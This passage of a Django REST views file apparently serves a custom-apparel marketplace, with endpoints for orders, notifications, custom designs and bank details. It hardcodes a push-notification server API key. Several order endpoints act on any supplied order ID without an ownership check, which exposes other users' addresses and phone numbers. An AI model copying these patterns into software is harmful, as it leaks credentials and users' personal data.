# follow send notification
#==================================================
def SendSetFollowNotification(senderId, receiverId,title,message,tag,table_id):
try:
push_service = FCMNotification(api_key="AAAAVQB1c9E:APA91bGcmaXhcyevDS9XKCF3lATdSoxMPqNoIZIDO8o34VCjV-Aj5hiAW1M5CwtBBeBVm1IsUVpQBtVLWTAG6isdVfxzGdMAFFHKzee7X72uYqWbeppdcAQbt0g9FrWhrbld4ZROgoeY")
idsArray_ios = []
receiver = User.objects.get(id=receiverId)
idsArray_ios.append(receiver.deviceId)
registration_ids_ios = idsArray_ios
message_title = title
message_body = message
if idsArray_ios.__len__() > 0:
data_message = {
"message_title" :title,
"message_body" : message,
"post_id":table_id,
"tag":tag,
"sender_id":senderId,
"receiver_id":receiverId
}
result = push_service.notify_multiple_devices(registration_ids=registration_ids_ios, message_title=title,sound ="default",message_body=message_body, data_message=data_message)
if result is not None:
return True
else:
return False
except Exception as e:
return False
#==========================================================
# Accept/Reject Order
#==========================================================
@AppVersion_required
@api_view(['POST'])
def AcceptRejectOrder(request):
try:
with transaction.atomic():
API_key = request.META.get('HTTP_AUTHORIZATION')
if API_key is not None:
try:
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='User').exists()
except:
return Response({"message" : "Session expired!! please login again", "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
if checkGroup:
orderpost_id = request.data['order_id']
order_status = request.data['order_status']
nowTime = datetime.datetime.utcnow().replace(tzinfo=utc)
if order_status == 1:
OrderPost.objects.filter(id = orderpost_id).update(order_status = ORDER_STATUS_ACCEPTED)
rec_id = OrderPost.objects.get(id = orderpost_id)
recvId = rec_id.user_id
user_exist= DuePayment.objects.filter(user_id=user.id,payment_status=1).exists()
if user_exist:
due_user = DuePayment.objects.get(user_id=user.id,payment_status=1)
due_amount = due_user.amount
print(due_amount,"kkk")
DuePayment.objects.filter(user_id=user.id,payment_status=1).update(amount=due_amount+rec_id.price)
else:
DuePayment.objects.create(user_id =user.id,
amount = rec_id.price,
payment_status = 1
)
id_noti = User.objects.get(id=recvId)
print(id_noti.onoffnotification)
if id_noti.onoffnotification == 1:
noti = Notification.objects.create(id = uuid.uuid1(),
receiver_id = recvId,
sender_id = user.id,
message = "Accept your order",
tag = "Order Accept",
notification_time = nowTime,
table_id = rec_id.id,
order_id = rec_id.id)
try:
Token.objects.get(user_id=recvId)
notify = SendAcceptOrderNotification(rec_id.id,str(user.fullname)+"has accepted your order","Order Accept",user.id,recvId)
return Response({'message':'Order has been accepted'}, status=status.HTTP_200_OK)
except:
return Response({'message':'Order has been accepted'}, status=status.HTTP_200_OK)
else:
noti = Notification.objects.create(id = uuid.uuid1(),
receiver_id = recvId,
sender_id = user.id,
message = "Accept your order",
tag = "Order Accept",
notification_time = nowTime,
table_id = rec_id.id,
order_id = rec_id.id)
return Response({'message':'Order has been accepted'}, status=status.HTTP_200_OK)
elif order_status == 0:
OrderPost.objects.filter(id = orderpost_id).update(order_status = ORDER_STATUS_REJECTED)
return Response({'message':'Order has been rejected'}, status=status.HTTP_200_OK)
else:
return Response({"status": "0", 'message':errorMessage}, status=status.HTTP_401_UNAUTHORIZED)
else:
return Response({"status": "0", 'message':errorMessage}, status=status.HTTP_401_UNAUTHORIZED)
else:
return Response({"status": "0", 'message':errorMessage}, status=status.HTTP_401_UNAUTHORIZED)
except Exception as e:
print(traceback.format_exc())
return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#==========================================================
#Past Orders
#==========================================================
from collections import defaultdict
@AppVersion_required
@api_view(['POST'])
def PastOrders(request):
try:
with transaction.atomic():
received_json_data = json.loads(request.body.decode('utf-8'), strict=False)
API_key = request.META.get('HTTP_AUTHORIZATION')
if API_key is not None:
try:
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='User').exists()
except:
return Response({"message": "Session expired!! please login again", "status": "0"},
status=status.HTTP_401_UNAUTHORIZED)
if checkGroup:
page_num = request.GET['page_num']
order1 = OrderPost.objects.filter(Q(order_status=1) | Q(order_status=2) | Q(order_status=0) | Q(order_status=-2)).filter (user_id = user.id).exclude(buyer_status = -1).order_by('-created_time')
paginator = Paginator(order1, 20)
try:
order1 = paginator.page(page_num)
except:
order1 = None
timeZone = received_json_data["timeZone"]
mainObject = {}
if order1:
order1serializer = OrderPostSerializer(order1,many=True)
order_data = order1serializer.data
if order_data.__len__() > 0:
oldDate = None
mainObject = []
tempNum = 0
for data in order_data:
obj2 = User.objects.get(id = data['user'])
obj3 = PostImage.objects.get(id = data['post_images'])
ob = PostImage.objects.filter(post_id = data['post'])
obj1 = Post.objects.get(id = data['post'])
price = obj1.price
obj4 = Size.objects.get(id = data['size'])
data['size_name'] = obj4.size
data['price'] = str(price)
data['serviceCharge'] = 6.00
data['shippingCost'] = 4.99
data['post_printing_size_front'] = obj1.post_printing_size_front
data['post_printing_size_back'] = obj1.post_printing_size_back
data['post_description'] = obj1.post_description
data['fullname'] = obj2.fullname
t=[]
if obj1.post_type=="custom":
for i in ob:
t.append(i.post_images)
data['post_image'] = t[0]
else:
data['post_image'] = obj3.post_images
data['colour_name'] = "Black"
data['post_by'] = obj1.user.fullname
newDate = datetime.datetime.strptime(data['created_time'], '%Y-%m-%dT%H:%M:%S.%fZ')
# newDate = newDate.astimezone(timezone(timeZone)).replace(tzinfo=None)
newDate = newDate.date()
b = True
if oldDate is None:
oldDate = newDate
if tempNum == 0:
listTemp = []
listTemp.append(data)
b = False
if oldDate != newDate:
mainObject.append({"date":oldDate, "list":listTemp})
oldDate = newDate
listTemp = []
listTemp.append(data)
if order_data.__len__() == tempNum+1:
if tempNum != 0:
pass
mainObject.append({"date":oldDate, "list":listTemp})
tempNum = tempNum+1
b = False
if order_data.__len__() == tempNum+1:
if tempNum != 0:
listTemp.append(data)
mainObject.append({"date":oldDate, "list":listTemp})
b = False
if b:
listTemp.append(data)
tempNum = tempNum + 1;
return Response({"response":mainObject, 'has_next':order1.has_next()}, status=status.HTTP_200_OK)
else:
return Response({"data" : []}, status=status.HTTP_200_OK)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except Exception as e:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#==============================================
#Listing of My Req Tab
#==============================================
from collections import defaultdict
from pytz import timezone
@AppVersion_required
@api_view(['POST'])
def MyRequest(request):
try:
with transaction.atomic():
received_json_data = json.loads(request.body.decode('utf-8'), strict=False)
API_key = request.META.get('HTTP_AUTHORIZATION')
if API_key is not None:
try:
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='User').exists()
except:
return Response({"message": "Session expired!! please login again", "status": "0"},
status=status.HTTP_401_UNAUTHORIZED)
if checkGroup:
page_num = request.GET['page_num']
# orderpostobj = OrderPost.objects.filter(post_id__user_id=user.id, order_status="PENDING").order_by('-created_time')
orderpostobj = OrderPost.objects.filter(post_id__user_id=user.id).exclude(seller_status = -1 ).order_by('-created_time')
paginator = Paginator(orderpostobj,20)
try:
orderpostobj = paginator.page(page_num)
except:
orderpostobj = None
timeZone = received_json_data["timeZone"]
mainObject = {}
if orderpostobj:
orderpostserializer = OrderPostSerializer(orderpostobj,many=True)
order_list = orderpostserializer.data
if order_list.__len__() > 0:
oldDate = None
mainObject = []
tempNum = 0
for data in order_list:
obj2 = User.objects.get(id = data['user'])
obj3 = PostImage.objects.get(id = data['post_images'])
ob = PostImage.objects.filter(post_id = data['post'])
obj1 = Post.objects.get(id = data['post'])
price = obj1.price
obj4 = Size.objects.get(id = data['size'])
data['size_name'] = obj4.size
data['colour_name'] = "Black"
data['post_description'] = obj1.post_description
data['post_printing_size_front'] = obj1.post_printing_size_front
data['post_printing_size_back'] = obj1.post_printing_size_back
data['price'] = str(price)
data['shippingCost'] = 4.99
data['fullname'] = obj2.fullname
t=[]
if obj1.post_type=="custom":
for i in ob:
t.append(i.post_images)
data['post_image'] = t[0]
else:
data['post_image'] = obj3.post_images
#data['colour'] = obj3.colour_id
data['post_by'] = obj1.user.fullname
newDate = datetime.datetime.strptime(data['created_time'], '%Y-%m-%dT%H:%M:%S.%fZ')
newDate = newDate.astimezone(timezone(timeZone)).replace(tzinfo=None)
# nowTime = newDate.timezone.now().replace(tzinfo=None).replace(microsecond=0)
newDate = newDate.date()
b = True
if oldDate is None:
oldDate = newDate
if tempNum == 0:
listTemp = []
listTemp.append(data)
b = False
if oldDate != newDate:
mainObject.append({"date":oldDate, "list":listTemp})
oldDate = newDate
listTemp = []
listTemp.append(data)
if order_list.__len__() == tempNum+1:
if tempNum != 0:
pass
mainObject.append({"date":oldDate, "list":listTemp})
tempNum = tempNum+1
b = False
if order_list.__len__() == tempNum+1:
if tempNum != 0:
listTemp.append(data)
mainObject.append({"date":oldDate, "list":listTemp})
b = False
if b:
listTemp.append(data)
tempNum = tempNum + 1;
return Response({"response":mainObject, 'has_next':orderpostobj.has_next()}, status=status.HTTP_200_OK)
else:
return Response({"data" : []}, status=status.HTTP_200_OK)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except Exception as e:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#====================================================
#Order Delete
#====================================================
@AppVersion_required
@api_view(['POST'])
def OrderDelete11(request):
try:
with transaction.atomic():
API_key = request.META.get('HTTP_AUTHORIZATION')
if API_key is not None:
try:
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='User').exists()
except:
return Response({"message" : "Session expired!! please login again", "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
order_id = request.data['order_id']
if checkGroup:
orderobj = OrderPost.objects.filter(id = order_id).filter(post_id__user_id = user.id)
if orderobj:
order1 = OrderPost.objects.filter(id = order_id).update(seller_status = -1)
# notify = Notification.objects.filter(tag = "order place").
else:
order1 = OrderPost.objects.filter(id = order_id).update(buyer_status = -1)
if order1:
return Response({"message" : deleteSuccessMessage}, status=status.HTTP_200_OK)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#====================================================
#Order Delete
#====================================================
@AppVersion_required
@api_view(['POST'])
def OrderDelete(request):
try:
with transaction.atomic():
API_key = request.META.get('HTTP_AUTHORIZATION')
if API_key is not None:
try:
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='User').exists()
except:
return Response({"message" : "Session expired!! please login again", "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
order_id = request.data['order_id']
page_num = request.data['page_num']
if checkGroup:
orderpostobj = OrderPost.objects.filter(post_id__user_id=user.id).exclude(seller_status = -1 ).order_by('-created_time')
aa=[]
for i in orderpostobj:
aa.append(i.id)
a_len = len(aa)
# round_re =int(round( a_len/5))
# if a_len/5 >round_re:
# pages = round_re+1
# else:
# pages = round_re
# n=5
# ww= [aa[i:i+n] for i in range(0, len(aa), n)]
# for index ,s in enumerate(ww):
# for index1 ,ss in enumerate(s):
# if ss == order_id:
# page_num = index+1
po1 = (page_num*20)
# for index, s in enumerate(aa):
if po1 >= a_len:
po1 ="false"
# if page_num < pages:
# has_next=True
# else:
# has_next=False
order1 = OrderPost.objects.filter(Q(order_status=1) | Q(order_status=2) | Q(order_status=0) | Q(order_status=-2)).filter (user_id = user.id).exclude(buyer_status = -1).order_by('-created_time')
a=[]
for i in order1:
a.append(i.id)
a_len = len(a)
# round_re1 =int(round( a_len/5))
# if a_len/5 >round_re1:
# pages1 = round_re1+1
# else:
# pages1 = round_re1
# ww1= [a[i:i+n] for i in range(0, len(a), n)]
# for indexx ,s1 in enumerate(ww1):
# for index3 ,ss1 in enumerate(s1):
# if ss1 == order_id:
# page_num = indexx + 1
po = (page_num*20)
#for index, s in enumerate(a):
if po >= a_len:
po ="false"
# if page_num < pages1:
# has_next=True
# else:
# has_next=False
orderobj = OrderPost.objects.filter(id = order_id).filter(post_id__user_id = user.id)
if orderobj:
order1 = OrderPost.objects.filter(id = order_id).update(seller_status = -1)
# notify = Notification.objects.filter(tag = "order place").
else:
order1 = OrderPost.objects.filter(id = order_id).update(buyer_status = -1)
if order1:
if request.data['type'] == "my_request":
if po1=="false":
return Response({"response" : [],"message" : deleteSuccessMessage,"has_next": False}, status=status.HTTP_200_OK)
orderpostobj = OrderPost.objects.filter(id=aa[po1])
orderpostobj1 = OrderPost.objects.filter(post_id__user_id=user.id).exclude(seller_status = -1 ).order_by('-created_time')
paginator = Paginator(orderpostobj1,20)
try:
orderpostobj1 = paginator.page(page_num)
except:
orderpostobj1 = None
timeZone = request.data["timeZone"]
mainObject = {}
if orderpostobj:
orderpostserializer = OrderPostSerializer(orderpostobj,many=True)
order_list = orderpostserializer.data
if order_list.__len__() > 0:
oldDate = None
mainObject = []
tempNum = 0
for data in order_list:
print(1)
obj2 = User.objects.get(id = data['user'])
obj3 = PostImage.objects.get(id = data['post_images'])
ob = PostImage.objects.filter(post_id = data['post'])
obj1 = Post.objects.get(id = data['post'])
price = obj1.price
obj4 = Size.objects.get(id = data['size'])
data['size_name'] = obj4.size
# data['colour_name'] = obj3.colour.colour
data['post_description'] = obj1.post_description
data['post_printing_size_front'] = obj1.post_printing_size_front
data['post_printing_size_back'] = obj1.post_printing_size_back
data['price'] = str(price)
data['shippingCost'] = 4.99
data['fullname'] = obj2.fullname
t=[]
if obj1.post_type=="custom":
for i in ob:
t.append(i.post_images)
data['post_image'] = t[0]
else:
data['post_image'] = obj3.post_images
# data['colour'] = obj3.colour_id
data['post_by'] = obj1.user.fullname
newDate = datetime.datetime.strptime(data['created_time'], '%Y-%m-%dT%H:%M:%S.%fZ')
newDate = newDate.astimezone(timezone(timeZone)).replace(tzinfo=None)
# nowTime = newDate.timezone.now().replace(tzinfo=None).replace(microsecond=0)
newDate = newDate.date()
b = True
if oldDate is None:
oldDate = newDate
if tempNum == 0:
listTemp = []
listTemp.append(data)
b = False
if oldDate != newDate:
mainObject.append({"date":oldDate, "list":listTemp})
oldDate = newDate
listTemp = []
listTemp.append(data)
b = False
if order_list.__len__() == tempNum+1:
if tempNum != 0:
listTemp.append(data)
mainObject.append({"date":oldDate, "list":listTemp})
b = False
if b:
listTemp.append(data)
tempNum = tempNum + 1;
return Response({"response":mainObject,"message" : deleteSuccessMessage ,"has_next": orderpostobj1.has_next()}, status=status.HTTP_200_OK)
else:
return Response({"data" : [],"response":mainObject}, status=status.HTTP_200_OK)
else:
if po=="false":
return Response({"response" : [],"message" : deleteSuccessMessage, "has_next":False}, status=status.HTTP_200_OK)
#page_num = request.data['page_num']
order1 = OrderPost.objects.filter(id=a[po])
order11 = OrderPost.objects.filter(Q(order_status=1) | Q(order_status=2) | Q(order_status=0) | Q(order_status=-2)).filter (user_id = user.id).exclude(buyer_status = -1).order_by('-created_time')
paginator = Paginator(order11, 20)
try:
order11 = paginator.page(page_num)
except:
order11 = None
timeZone = request.data["timeZone"]
mainObject = {}
if order1:
order1serializer = OrderPostSerializer(order1,many=True)
order_data = order1serializer.data
if order_data.__len__() > 0:
oldDate = None
mainObject = []
tempNum = 0
for data in order_data:
obj2 = User.objects.get(id = data['user'])
print(obj2,"obj2")
obj3 = PostImage.objects.get(id = data['post_images'])
ob = PostImage.objects.filter(post_id = data['post'])
print(data['post'],"hh")
print(ob,"kk")
obj1 = Post.objects.get(id = data['post'])
print(obj1,"obj1")
price = obj1.price
obj4 = Size.objects.get(id = data['size'])
data['size_name'] = obj4.size
data['price'] = str(price)
data['serviceCharge'] = 6.00
data['shippingCost'] = 4.99
data['post_description'] = obj1.post_description
data['post_printing_size_front'] = obj1.post_printing_size_front
data['post_printing_size_back'] = obj1.post_printing_size_back
data['fullname'] = obj2.fullname
print(obj2.fullname,"fullname")
t=[]
if obj1.post_type=="custom":
for i in ob:
t.append(i.post_images)
data['post_image'] = t[0]
else:
data['post_image'] = obj3.post_images
#data['colour_name'] = obj3.colour.colour
data['post_by'] = obj1.user.fullname
print(obj1.user.fullname)
#data['colour'] = obj3.colour_id
newDate = datetime.datetime.strptime(data['created_time'], '%Y-%m-%dT%H:%M:%S.%fZ')
# newDate = newDate.astimezone(timezone(timeZone)).replace(tzinfo=None)
newDate = newDate.date()
b = True
if oldDate is None:
oldDate = newDate
if tempNum == 0:
listTemp = []
listTemp.append(data)
b = False
if oldDate != newDate:
mainObject.append({"date":oldDate, "list":listTemp})
oldDate = newDate
listTemp = []
listTemp.append(data)
b = False
if order_data.__len__() == tempNum+1:
if tempNum != 0:
listTemp.append(data)
mainObject.append({"date":oldDate, "list":listTemp})
b = False
if b:
listTemp.append(data)
tempNum = tempNum + 1;
return Response({"response":mainObject,"message" : deleteSuccessMessage,"has_next": order11.has_next(),"message" : deleteSuccessMessage}, status=status.HTTP_200_OK)
else:
return Response({"data" : [],"message" : deleteSuccessMessage}, status=status.HTTP_200_OK)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#====================================================
#Order Detail
#======================================================
@AppVersion_required
@api_view(['POST'])
def OrderDetail(request):
try:
with transaction.atomic():
API_key = request.META.get('HTTP_AUTHORIZATION')
if API_key is not None:
try:
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='User').exists()
except:
return Response({"message" : "Session expired!! please login again", "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
order_id = request.data['order_id']
if checkGroup:
order1 = OrderPost.objects.filter(id = order_id)
if order1:
order1serializer = OrderPostSerializer(order1,many=True)
order_data = order1serializer.data
for data in order_data:
obj1 = Post.objects.get(id = data['post'])
if obj1.post_type=="custom":
price = obj1.price
obj2 = PostImage.objects.get(id = data['post_images'])
ob = PostImage.objects.filter(post_id = data['post'])
obj3 = User.objects.get(id = data['user'])
obj4 = Size.objects.get(id = data['size'])
data['size_name'] = obj4.size
data['colour_name'] = "Black"
temp=[]
for i in ob:
temp.append(i.post_images)
data['post_images'] = temp
#data['colour'] = obj2.colour_id
data['post_description'] = obj1.post_description
data['price'] = str(price)
data['serviceCharge'] = 6.00
data['shippingCost'] = 4.99
data['order_by'] = obj3.fullname
data['order_by_image'] = obj3.image
data['post_printing_size_front'] = obj1.post_printing_size_front
data['post_printing_size_back'] = obj1.post_printing_size_back
order_by_id = obj3.id
design_by_id = obj1.user.id
data['design_by_id'] = design_by_id
data['design_by'] = obj1.user.fullname
data['design_by_image'] = obj1.user.image
data['design_by_address'] = obj1.user.address
newDate = datetime.datetime.strptime(data['created_time'], '%Y-%m-%dT%H:%M:%S.%fZ')
newDate = newDate.date()
data['date'] = newDate
if order_by_id == user.id:
data['message_id'] = obj1.user.id
else:
data['message_id'] = obj3.id
report1 = ReportPost.objects.filter(user_id = user.id, post_id = obj1.id)
if report1:
data['report_post'] = True
else:
data['report_post'] = False
last_ad = OrderTrn.objects.filter(user_id=obj3.id).order_by('-transaction_time').first()
if last_ad:
add1 = Addresses.objects.filter(id=last_ad.address.id,status=1).values("first_name","last_name","city","postal_code","city","address","phone")
if add1:
data['order_by_address'] = add1
else:
price = obj1.price
obj2 = PostImage.objects.get(id = data['post_images'])
ob = PostImage.objects.filter(id = data['post_images'])
obj3 = User.objects.get(id = data['user'])
obj4 = Size.objects.get(id = data['size'])
data['size_name'] = obj4.size
data['colour_name'] = "Black"
temp1=[]
for i in ob:
temp1.append(i.post_images)
data['post_images'] = temp1
#data['colour'] = obj2.colour_id
data['post_description'] = obj1.post_description
data['price'] = str(price)
data['serviceCharge'] = 6.00
data['shippingCost'] = 4.99
data['order_by'] = obj3.fullname
data['order_by_image'] = obj3.image
data['post_printing_size_front'] = obj1.post_printing_size_front
data['post_printing_size_back'] = obj1.post_printing_size_back
order_by_id = obj3.id
design_by_id = obj1.user.id
data['design_by_id'] = design_by_id
data['design_by'] = obj1.user.fullname
data['design_by_image'] = obj1.user.image
data['design_by_address'] = obj1.user.address
newDate = datetime.datetime.strptime(data['created_time'], '%Y-%m-%dT%H:%M:%S.%fZ')
newDate = newDate.date()
data['date'] = newDate
if order_by_id == user.id:
data['message_id'] = obj1.user.id
else:
data['message_id'] = obj3.id
report1 = ReportPost.objects.filter(user_id = user.id, post_id = obj1.id)
if report1:
data['report_post'] = True
else:
data['report_post'] = False
last_ad = OrderTrn.objects.filter(user_id=obj3.id).order_by('-transaction_time').first()
if last_ad:
add1 = Addresses.objects.filter(id=last_ad.address.id,status=1).values("first_name","last_name","city","postal_code","city","address","phone")
if add1:
data['order_by_address'] = add1
return Response({"data":data}, status=status.HTTP_200_OK)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except Exception as e:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#======================================================
# Cancel Order
#======================================================
@AppVersion_required
@api_view(['POST'])
def CancelOrder(request):
try:
with transaction.atomic():
API_key = request.META.get('HTTP_AUTHORIZATION')
if API_key is not None:
try:
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='User').exists()
except:
return Response({"message" : "Session expired!! please login again", "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
if checkGroup:
orderpost_id = request.data['order_id']
order_status = request.data['order_status']
if order_status == -2 :
OrderPost.objects.filter(id = orderpost_id).update(order_status = ORDER_STATUS_CANCEL)
return Response({'message':'Order has been Cancelled'}, status=status.HTTP_200_OK)
else:
return Response({"status": "0", 'message':errorMessage}, status=status.HTTP_401_UNAUTHORIZED)
else:
return Response({"status": "0", 'message':errorMessage}, status=status.HTTP_401_UNAUTHORIZED)
else:
return Response({"status": "0", 'message':errorMessage}, status=status.HTTP_401_UNAUTHORIZED)
except Exception as e:
print(traceback.format_exc())
return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#====================================================
# Notification List
#====================================================
@api_view(['GET'])
@AppVersion_required
def GetNotificationList(request):
try:
with transaction.atomic():
API_key = request.META.get('HTTP_AUTHORIZATION')
if API_key is not None:
try:
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='User').exists()
except:
return Response({"message": "Session expired!! please login again", "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
# page_num = request.GET['page_num']
if checkGroup:
notificationObjs = Notification.objects.filter(receiver_id=user.id).order_by('-notification_time')
# paginator = Paginator(notificationObjs, 4)
# try:
# notificationObjs = paginator.page(page_num)
# except:
# notificationObjs = None
if notificationObjs:
serializedData = NotificationSerializer(notificationObjs,many=True).data
for data in serializedData:
obj1 = User.objects.get(id = data['sender'])
obj2 = User.objects.get(id = data['receiver'])
obj3 = FollowUser.objects.filter(follow_by_id = user.id, follow_to_id =data['sender'])
data['sender_name'] = obj1.fullname
data['sender_image'] = obj1.image
data['receiver_image'] = obj2.image
if data['tag'] == "like" or data['tag'] == "order place":
obj5 = PostImage.objects.filter(post_id = data['table_id'])
for i in obj5:
data['post_image'] = i.post_images
elif data['tag'] == "Order Accept":
obj7 = OrderPost.objects.get(id = data['table_id'])
jj = obj7.post_id
obj8 = PostImage.objects.filter(post_id = jj)
for k in obj8:
data['post_image'] = k.post_images
else:
data['post_image'] = None
if obj3:
data["follow_status"] = True
else:
data["follow_status"] = False
objs = Notification.objects.filter(receiver_id=user.id).update(is_read=1)
return Response({'message': 'success', 'data': serializedData},status=status.HTTP_200_OK)
else:
return Response({"data": []}, status=status.HTTP_200_OK)
else:
return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_401_UNAUTHORIZED)
else:
return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_401_UNAUTHORIZED)
except Exception as e:
print(traceback.format_exc())
return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#================================================
# delete notification
#================================================
@AppVersion_required
@api_view(['GET'])
def DeleteNotification(request):
try:
with transaction.atomic():
API_key = request.META.get('HTTP_AUTHORIZATION')
if API_key is not None:
try:
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='User').exists()
except:
return Response({"message": "Session expired!! please login again", "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
if checkGroup:
notiff = Notification.objects.filter(receiver_id = user.id)
if notiff:
nott = Notification.objects.filter(receiver_id=user.id).delete()
return Response({"message": deleteSuccessMessage},status=status.HTTP_200_OK)
else:
return Response({"message" : "you don't have any notification"}, status=status.HTTP_200_OK)
else:
return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_401_UNAUTHORIZED)
except Exception as e:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
def priceindecimal(postjson):
try:
for index, data in enumerate(postjson.data):
data['price'] = Decimal(data['price'])
except Exception:
print("Something Wents Wrong")
###############################################################################################
# Custom design
##############################################################################################
@AppVersion_required
@api_view(['GET'])
def getCustomList(request):
try:
with transaction.atomic():
# received_json_data = json.loads(request.body.decode('utf-8'), strict=False)
try:
API_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='User').exists()
if checkGroup == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
clothstyle = ClothStyle.objects.all()
clothstyleserializer = ClothStyleSerializer(clothstyle,many=True)
priceindecimal(clothstyleserializer)
obj = clothstyleserializer.data
shape = Shape.objects.all()
shapeserializer = ShapeSerializer(shape,many=True)
priceindecimal(shapeserializer)
shapecolour = ShapeColour.objects.all()
shapecolourserializer = ShapeColourSerializer(shapecolour,many=True)
b = {}
shapefillcolour = ShapeFillColour.objects.all()
shapeFillcolourserializer = ShapeFillColourSerializer(shapefillcolour,many=True)
shapeemptylist = shapeFillcolourserializer.data
shapeemptylist.insert(0,b)
size = CustSize.objects.all()
sizeserializer = CustSizeSerializer(size,many=True)
priceindecimal(sizeserializer)
return Response({"message" : "Response Send Succesfully","status" : "1","clothstyle":obj ,"shape":shapeserializer.data,"shape_border_colour":shapecolourserializer.data,"shape_fill_colour":shapeemptylist,"size":sizeserializer.data}, status=status.HTTP_200_OK)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#################################################################
# Add bank account
##################################################################
@api_view(['POST'])
def AddBank(request):
try:
with transaction.atomic():
API_key = request.META.get('HTTP_AUTHORIZATION')
if API_key is not None:
try:
token1 = Token.objects.get(key=API_key)
user = token1.user
except:
return Response({"message" : "Session expired!! please login again", "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
checkGroup = user.groups.filter(name='User').exists()
if checkGroup:
stripe.api_key = settings.STRIPE_SECRET_KEY
account_holder_name = bytes(request.data['account_holder_name'],'utf-8')
account_holder_name = cipher_suite.encrypt(account_holder_name)
account_holder_name = account_holder_name.decode("utf-8")
account_holder_type = bytes(request.data['account_holder_type'],'utf-8')
account_holder_type = cipher_suite.encrypt(account_holder_type)
account_holder_type = account_holder_type.decode("utf-8")
routing_number = bytes(request.data["routing_number"],'utf-8')
routing_number = cipher_suite.encrypt(routing_number)
routing_number = routing_number.decode("utf-8")
account_number = bytes(request.data["account_number"],'utf-8')
account_number = cipher_suite.encrypt(account_number)
account_number = account_number.decode("utf-8")
if user.has_bank_account == 0:
bankacc = BankDetail.objects.create(Account_name = account_holder_name,
Type = account_holder_type,
routing_number = routing_number,
acc_number = account_number,
user_id = user.id)
if bankacc is not None:
User.objects.filter(id=user.id).update(has_bank_account=1)
return Response({"message" : "Bank added successfully", "status" : "1", "bank_detail": BankDetailSerializer(bankacc).data}, status=status.HTTP_200_OK)
else:
bankacc = BankDetail.objects.filter(user_id=user.id).update(Account_name = account_holder_name,
Type = account_holder_type,
routing_number = routing_number,
acc_number = account_number,
user_id = user.id)
if bankacc is not None:
detail = BankDetail.objects.get(user_id=user.id)
serl = BankDetailSerializer(detail).data
print(serl,"hgjh")
return Response({"message" : "Bank detail updated sucessfully", "status" : "1","bank_detail":serl}, status=status.HTTP_200_OK)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except Exception as e:
print(traceback.format_exc())
return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#======================================================
# Admin API's
#======================================================
#========================================
# api for SignUp user
#========================================
# @AppVersion_required
@csrf_exempt
@api_view(['POST'])
def SignUpAdmin(request):
try:
with transaction.atomic():
received_json_data = json.loads(request.body.decode('utf-8'), strict=False)
try:
user = User.objects.get(email = received_json_data['email'])
return Response({"message" : errorEmailExist, "status" : "0"}, status=status.HTTP_409_CONFLICT)
except:
